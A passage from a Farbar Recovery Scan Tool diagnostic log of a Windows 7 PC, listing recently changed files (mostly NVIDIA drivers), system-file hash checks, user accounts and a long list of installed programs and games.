2018-02-26 15:17 - 2018-02-25 06:37 - 035188640 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 019854312 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 013571008 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 011131696 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 000419488 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 016496080 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 001153752 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000902280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000541672 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000460024 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000182600 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000164952 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000159712 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000142816 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 018910384 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 012966032 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 011000288 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 003918512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\SysWOW64\nv-vk32.json
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\system32\nv-vk64.json
2018-02-26 14:45 - 2017-12-15 03:03 - 000059240 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2018-02-23 15:09 - 2018-02-23 15:09 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Piece of Cake studios

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-19 16:56 - 2013-10-17 21:32 - 000000000 ____D C:\Users\Martin
2018-03-19 16:56 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-03-19 16:56 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-03-19 16:53 - 2013-11-14 20:32 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA Corporation
2018-03-19 16:51 - 2014-10-08 23:05 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Temp
2018-03-19 16:51 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-03-19 16:50 - 2014-08-16 13:47 - 000000000 ____D C:\Windows\Minidump
2018-03-02 11:13 - 2015-05-08 17:01 - 000253880 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2018-03-02 11:12 - 2013-10-17 22:18 - 000000000 ____D C:\Program Files (x86)\Steam
2018-03-02 11:12 - 2013-10-17 21:57 - 000000000 ____D C:\ProgramData\NVIDIA
2018-03-02 11:12 - 2013-10-17 09:50 - 000000000 ____D C:\Users\Martin\AppData\Local\LogMeIn Hamachi
2018-03-02 10:26 - 2009-07-14 06:13 - 000782470 _____ C:\Windows\system32\PerfStringBackup.INI
2018-03-02 10:26 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2018-03-02 10:21 - 2013-10-21 11:33 - 000000000 ____D C:\Users\Martin\AppData\Roaming\EVEMon
2018-03-02 08:24 - 2014-10-31 23:52 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2013-10-17 22:12 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2018-03-02 07:57 - 2013-10-17 21:55 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-03-01 17:28 - 2015-12-29 21:35 - 000000000 ____D C:\Users\Martin\AppData\Local\CrashDumps
2018-03-01 17:27 - 2014-11-01 00:45 - 000000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2018-03-01 17:24 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\Resources
2018-03-01 17:14 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2018-03-01 17:10 - 2014-05-11 08:30 - 000002233 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-03-01 17:08 - 2009-07-14 04:20 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-03-01 17:06 - 2015-08-01 20:51 - 000000000 ____D C:\Users\Martin\AppData\Roaming\qBittorrent
2018-03-01 17:06 - 2013-10-18 00:10 - 000000000 ____D C:\Users\Martin\AppData\Roaming\DAEMON Tools Lite
2018-03-01 17:05 - 2013-12-11 18:03 - 000000000 ____D C:\Users\Martin\AppData\Local\Battle.net
2018-03-01 16:51 - 2013-10-17 22:16 - 000000000 ____D C:\Users\Martin\AppData\Roaming\Skype
2018-03-01 08:21 - 2013-11-02 11:57 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA
2018-02-26 15:19 - 2017-12-10 03:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2018-02-26 15:19 - 2013-12-05 18:49 - 000000000 ____D C:\temp
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2018-02-26 14:45 - 2018-01-01 14:12 - 000004146 _____ C:\Windows\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003814 _____ C:\Windows\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003798 _____ C:\Windows\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003730 _____ C:\Windows\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003554 _____ C:\Windows\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003494 _____ C:\Windows\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:43 - 2016-01-03 15:27 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-02-26 14:42 - 2016-01-03 15:27 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2018-02-25 06:36 - 2016-06-25 22:00 - 000505232 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2018-02-25 06:36 - 2015-12-27 20:47 - 019925592 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2018-02-25 06:36 - 2013-10-17 21:56 - 022845992 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 015558416 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 004424400 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2018-02-24 13:46 - 2013-10-17 21:56 - 000045511 _____ C:\Windows\system32\nvinfo.pb
2018-02-23 21:01 - 2017-12-10 03:01 - 000001951 _____ C:\Windows\NvContainerRecovery.bat
2018-02-23 20:22 - 2015-12-27 20:48 - 000633984 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2018-02-23 20:22 - 2015-12-27 20:48 - 000081752 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 005953096 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 002587992 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 001768008 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000451144 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000122896 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2018-02-20 16:47 - 2014-05-11 08:32 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Heroes and Generals
2018-02-17 14:54 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\rescache
2018-02-17 13:46 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\AppCompat

==================== Files in the root of some directories =======

2015-02-07 14:37 - 2015-02-07 14:37 - 000000099 _____ () C:\Users\Martin\AppData\Roaming\LauncherSettings_live.cfg
2014-09-24 22:04 - 2015-04-20 15:06 - 000002544 _____ () C:\Users\Martin\AppData\Roaming\SpeedRunnersLog.txt
2014-06-05 16:13 - 2017-03-29 08:32 - 000000039 _____ () C:\Users\Martin\AppData\Roaming\trafikcfg.ini
2014-07-26 08:25 - 2014-07-26 08:25 - 000007602 _____ () C:\Users\Martin\AppData\Local\Resmon.ResmonCfg
2017-01-30 10:49 - 2017-12-12 09:40 - 000045056 _____ () C:\Users\Martin\AppData\Local\WebpageIcons.db
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ () C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe
[2018-01-05 13:05] - [2018-01-01 02:50] - 000455680 _____ (Microsoft Corporation) 11D6A262B617130F7C16E308C12E0D41

C:\Windows\system32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\system32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\system32\services.exe => MD5 is legit
C:\Windows\system32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\system32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\system32\rpcss.dll
[2018-01-05 13:05] - [2018-01-01 03:18] - 000512000 _____ (Microsoft Corporation) BA6C9EE518A11DA4AD061B223EBED3D3

C:\Windows\system32\dnsapi.dll => MD5 is legit
C:\Windows\SysWOW64\dnsapi.dll => MD5 is legit
C:\Windows\system32\Drivers\volsnap.sys => MD5 is legit

LastRegBack: 2018-02-27 17:55

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Martin (19-03-2018 16:59:35)
Running from D:\User profile\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2013-10-17 20:32:57)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1755371218-3412237994-1746218496-500 - Administrator - Disabled)
Guest (S-1-5-21-1755371218-3412237994-1746218496-501 - Limited - Disabled)
Martin (S-1-5-21-1755371218-3412237994-1746218496-1000 - Administrator - Enabled) => C:\Users\Martin

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)


==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Actual Multiple Monitors 8.1.1 (HKLM-x32\...\Actual Multiple Monitors_is1) (Version: 8.1.1 - Actual Tools)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated)
Adobe Flash Player 28 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 28.0.0.161 - Adobe Systems Incorporated)
Alien Isolation (HKLM-x32\...\Alien Isolation_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
ArcGIS 10.2.2 for Desktop (HKLM-x32\...\{761CB033-D425-4A16-954D-EA8DEF4D053B}) (Version: 10.2.3552 - Environmental Systems Research Institute, Inc.) Hidden
ArcGIS 10.2.2 for Desktop (HKLM-x32\...\ArcGIS 10.2.2 for Desktop) (Version: 10.2.3552 - Environmental Systems Research Institute, Inc.)
Artemis Artemis (HKLM-x32\...\Artemis) (Version: 2.00.0 - Thom Robertson)
Audacity 2.0.4 (HKLM-x32\...\Audacity_is1) (Version: 2.0.4 - Audacity Team)
Audiobook Cutter Free Edition (HKLM-x32\...\{7B460E9F-8AEC-4A46-81D5-25A3D15365F1}) (Version: 1.9.3 - Audiobook Software)
Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.10.150607 - )
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
BFME2 All-In-One Patch Installer & Switcher version 1.0 (HKLM-x32\...\{B258BEC7-DFB5-4DDC-BA90-BF02B91CA0C6}_is1) (Version: 1.0 - dijkstra & forshire)
Breach (HKLM\...\UDK-640527a6-bd3d-4ff1-8130-b9100ba72023) (Version:  - Epic Games, Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.23 - Piriform)
CloneCD (HKLM-x32\...\CloneCD) (Version:  - SlySoft)
Commandos 2 and 3 (HKLM-x32\...\GOGPACKCOMMANDOS23_is1) (Version: 2.0.0.15 - GOG.com)
Commandos Ammo Pack (HKLM-x32\...\GOGPACKCOMMANDOS1_is1) (Version: 2.0.0.19 - GOG.com)
Company of Heroes (HKLM-x32\...\{BA801B94-C28D-46EE-B806-E1E021A3D519}) (Version: 1.0.0.78 - THQ Inc.)
Core Temp 1.0 RC6 (HKLM\...\{086D343F-8E78-4AFC-81AC-D6D414AFD8AC}_is1) (Version: 1.0 - Alcpu)
Cossacks 3 (HKLM-x32\...\1797227701_is1) (Version: 1.8.8.81.5707 - GOG.com)
Cossacks 3: Guardians of the Highlands (HKLM-x32\...\1483750963_is1) (Version: 1.8.8.81.5707 - GOG.com)
Cossacks Anthology (HKLM-x32\...\Cossacks Anthology_is1) (Version:  - GOG.com)
Cuphead (HKLM-x32\...\1963513391_is1) (Version: hotfix_1.1.4 - GOG.com)
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.47.1.0337 - Disc Soft Ltd)
Dark Reign + Expansion (HKLM-x32\...\GOGPACKDARKREIGN_is1) (Version: 2.0.0.41 - GOG.com)
Defraggler (HKLM\...\Defraggler) (Version: 2.19 - Piriform)
Diaspora version 1.1.1 (HKLM-x32\...\{1F5ABAAA-6D61-4FC1-A595-86CBA5517E7A}_is1) (Version: 1.1.1 - Diaspora Development)
Discord (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\Discord) (Version: 0.0.300 - Discord Inc.)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 391.01 - NVIDIA Corporation) Hidden
DisplayFusion 5.1.1 (HKLM-x32\...\B076073A-5527-4f4f-B46B-B10692277DA2_is1) (Version: 5.1.1.0 - Binary Fortress Software)
Distrust (HKLM-x32\...\Distrust_is1) (Version:  - )
Divinity - Original Sin Enhanced Edition (HKLM-x32\...\1445516929_is1) (Version: 2.5.0.12 - GOG.com)
Divinity Original Sin 2 (HKLM-x32\...\Divinity Original Sin 2_is1) (Version:  - )
Dolphin VR 4.0 (HKLM-x32\...\Dolphin) (Version: 4.0 - Dolphin Team)
Doom (HKLM-x32\...\{B6A2B3BA-C93E-4AEE-BBCF-BE91DDC84962}_is1) (Version:  - id Software)
EasyLog USB (HKLM-x32\...\{4F84DDD2-7468-4771-9906-3552521CE796}) (Version: 6.8.0 - Lascar Electronics Ltd.)
Elite Dangerous Launcher version 0.4.5499.0 (HKLM-x32\...\{696F8871-C91D-4CB1-825D-36BE18065575}_is1) (Version: 0.4.5499.0 - Frontier Developments)
Enter the Gungeon (HKLM-x32\...\1456912569_is1) (Version: 2.7.0.9 - GOG.com)
EVEMon (HKLM-x32\...\EVEMon) (Version: 2.2.3 - battleclinic.com)
EVERSPACE (HKLM-x32\...\1513949567_is1) (Version: 2.0.0.2 - GOG.com)
Exact Audio Copy 1.3 (HKLM-x32\...\Exact Audio Copy) (Version: 1.3 - Andre Wiethoff)
f.lux (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\Flux) (Version:  - f.lux Software LLC)
ForHonor (HKLM-x32\...\Uplay Install 569) (Version:  - Ubisoft)
Game of Thrones Episode 6 (HKLM-x32\...\Game of Thrones Episode 6_is1) (Version:  - )
GameRanger (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\GameRanger) (Version:  - GameRanger Technologies)
Gauntlet Slayer Edition (HKLM-x32\...\Gauntlet Slayer Edition_is1) (Version:  - )
GOG.com Commandos 2 (HKLM\...\{c1a036f7-30df-46e5-b5a3-c5e67039e947}.sdb) (Version:  - )
GOG.com Heroes of Might and Magic 3 (HKLM\...\{1d3c859c-1028-4822-b0a7-da4f7bbc18bc}.sdb) (Version:  - )
GOG.com The Settlers 3 (HKLM\...\{f707a2f1-2ed1-4560-a087-97aa176c3777}.sdb) (Version:  - )
GOG.com Unreal Tournament GOTY (HKLM\...\{fa491d91-322c-4059-a1f7-4a79782edee8}.sdb) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 64.0.3282.186 - Google Inc.)
Google Earth Pro (HKLM-x32\...\{FA1BBF34-E994-4310-95D7-BE93092B8E61}) (Version: 7.3.1.4507 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
Hammerwatch (HKLM-x32\...\GOGPACKHAMMERWATCH_is1) (Version: 2.3.0.6 - GOG.com)
Hand of Fate - Wildcards (HKLM-x32\...\Hand of Fate: Wildcards_is1) (Version: 2.3.0.7 - GOG.com)
Hand of Fate (HKLM-x32\...\1424100574_is1) (Version: 2.4.0.8 - GOG.com)
Hand of Fate 2 (HKLM\...\aGFuZG9mZmF0ZTI_is1) (Version: 1 - )
Handset USB Driver (HKLM\...\{D2D77DC2-8299-11D1-8949-444553540000}_is1) (Version: 5.2066.1.A14B04 - )
HCS Voice Pack version 1.6.2 (HKLM-x32\...\{CEAF7641-D8E3-41C2-9D26-13D1DE9E6EF7}_is1) (Version: 1.6.2 - HCS Voice Packs)
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
HELLDIVERS (HKLM-x32\...\HELLDIVERS_is1) (Version:  - )
Heroes & Generals (HKLM-x32\...\Heroes & Generals) (Version: 1.0.6.1 - Reto-Moto)
Heroes of Might and Magic 3 Complete (HKLM-x32\...\GOGPACKHOMM3COMPLETE_is1) (Version: 2.0.0.16 - GOG.com)
HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.1.4.6 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.232 - SurfRight B.V.)
Homeworld Deserts of Kharak (HKLM-x32\...\Homeworld Deserts of Kharak_is1) (Version:  - )
Homeworld Remastered Collection (HKLM-x32\...\SG9tZXdvcmxkUmVtYXN0ZXJlZENvbGxlY3Rpb24=_is1) (Version: 1 - )
How to Survive (HKLM-x32\...\How to Survive_is1) (Version:  - )
How to Survive El Diablo Islands (HKLM-x32\...\How to Survive El Diablo Islands_is1) (Version:  - )
HP Dropbox Plugin (HKLM-x32\...\{23617173-F935-4C17-A323-EB1207F3ED49}) (Version: 36.0.31.53050 - Hewlett-Packard Co.)
HP ENVY 4520 series Basic Device Software (HKLM\...\{AA543771-C534-4954-831A-9862C626796F}) (Version: 36.0.72.54013 - Hewlett-Packard Co.)
HP Google Drive Plugin (HKLM-x32\...\{AFF80405-E56A-48E7-98FC-8E46E261949F}) (Version: 36.0.31.53050 - Hewlett-Packard Co.)
Hunted - The Demon's Forge (HKLM-x32\...\Hunted - The Demon's Forge_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
iDealshare VideoGo 6.1.1.6250 (HKLM-x32\...\{CC4C06C4-7C78-4AAB-B5AF-33FB11CCD850}_is1) (Version:  - iDealshare Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)
Java™ 6 Update 45 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86416045FF}) (Version: 6.0.450 - Oracle)
K-Lite Mega Codec Pack 12.9.0 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 12.9.0 - KLCP)
Kutools for Excel 11.0.0.228 (HKLM-x32\...\{A095BA43-4A97-4D55-8E25-A0BC46F10765}_is1) (Version: 11.0.0.0 - Detong)
L.A.Noire (HKLM-x32\...\L.A.Noire_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
LaCie Private Public version 1.2 (HKLM\...\{5553AC21-44FC-4F8B-B3BB-3B7E913F465B}_is1) (Version: 1.2 - LaCie Private, Inc.)
Legend of Grimrock 2 (HKLM-x32\...\Legend of Grimrock 2_is1) (Version:  - )
Lightning (HKLM-x32\...\{277C2E30-99C8-40A5-B5F6-A21422ACDB6A}) (Version:  - )
Little Big Adventure (HKLM-x32\...\GOGPACKLBA_is1) (Version: 2.0.0.20 - GOG.com)
Little Big Adventure 2 (HKLM-x32\...\GOGPACKLBA2_is1) (Version: 2.0.0.6 - GOG.com)
Little Nightmares (HKLM-x32\...\Little Nightmares_is1) (Version:  - )
Little Nightmares Secrets of The Maw Chapter 1 (HKLM-x32\...\Little Nightmares Secrets of The Maw Chapter 1_is1) (Version:  - )
LogMeIn Hamachi (HKLM-x32\...\{99A016E1-0840-43AE-8434-A18CEDFA833B}) (Version: 2.2.0.58 - LogMeIn, Inc.) Hidden
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.58 - LogMeIn, Inc.)
LOTR The Return of the King tm (HKLM-x32\...\{6E298B0A-558C-4138-0096-740677B382CD}) (Version:  - )
Malwarebytes version 3.3.1.2183 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.3.1.2183 - Malwarebytes)
Master of Magic (HKLM-x32\...\GOGPACKMASTEROFMAGIC_is1) (Version: 2.0.0.20 - GOG.com)
Metal SLUG X 1.0 (HKLM-x32\...\Metal SLUG X 1.0) (Version: 1.0 - Игры на Cat-A-Cat.NET)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Office Proofing Tools 2013 Preview - English (HKLM\...\{20150000-001F-0409-1000-0000000FF1CE}) (Version: 15.0.4128.1014 - Microsoft Corporation)
Microsoft Office Proofing Tools 2013 Preview - Swedish (HKLM\...\{20150000-001F-041D-1000-0000000FF1CE}) (Version: 15.0.4128.1014 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package (HKLM-x32\...\Microsoft Visual J# 2.0 Redistributable Package) (Version:  - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)
